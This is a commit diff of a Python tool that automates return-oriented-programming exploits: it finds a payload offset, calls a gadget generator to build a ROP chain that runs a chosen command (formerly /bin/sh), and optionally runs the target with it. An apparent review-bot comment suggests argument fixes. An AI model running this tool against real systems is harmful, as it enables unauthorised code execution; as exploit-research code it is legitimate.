Add execve arguments

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
Liam Dalgarno
2020-11-28 17:42:09 +00:00
parent b38616fd71
commit f92b6e9ccd
5 changed files with 66 additions and 25 deletions


@ -4,6 +4,7 @@ import math
import os
import subprocess
import sys
import json
from contextlib import redirect_stderr
from pwnlib.context import context
@ -35,15 +36,16 @@ print(r'''
arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("--rop_file", metavar="rop_file", default="rop.txt", type=str, help="The name of the generated ROP input file")
arg_parser.add_argument("--rop_exec", metavar="rop_exec", default="/bin/sh", type=str, help="The path to the executable the ROP should run")
arg_parser.add_argument("--rop_exec_file", metavar="rop_exec", default="rop_exec.json", type=str, help="The path to the file containing the command for the ROP to run")
arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
args = arg_parser.parse_args()
exec_file = args.exec_file
rop_file = args.rop_file
rop_exec = args.rop_exec
rop_exec_file = args.rop_exec_file
min_payload = args.min_payload
max_payload = args.max_payload
run = args.run
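Review bot: The new `--rop_exec_file` option still carries `metavar="rop_exec"`, copied from the `--rop_exec` option above it, so the usage line shows the same placeholder for two different options; it should read `metavar="rop_exec_file"`. The value is only consumed later as the `--execFile` argument of the subprocess in the third hunk, so a missing or mistyped path is not reported until that tool runs; a check right after `rop_exec_file = args.rop_exec_file`, e.g. `if not os.path.isfile(rop_exec_file): sys.exit(f"ROP exec file not found: {rop_exec_file}")`, would fail early with a clear message (os and sys are already imported in the first hunk). The help text could also name the expected file format, which appears to be JSON given the default `rop_exec.json` and the newly added `import json`, though the visible hunks do not show the file being parsed, so confirm before documenting it.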
@ -96,15 +98,18 @@ result = subprocess.run(
"--silent",
"--paddingLen", str(offset),
"--ropFile", rop_file,
"--execPath", rop_exec
"--execFile", rop_exec_file,
],
stdout = subprocess.PIPE
)
with open("log/ropgadget.log", "wb") as f:
f.write(result.stdout)
print(f" └─[🤩] All done! The ROP input is saved to {rop_file}!")
if run:
pwnlibexit._run_handlers()
print()
print(f"[ Run Program : ./{exec_file} {rop_file} ]")
os.execv(exec_file, [exec_file, rop_file])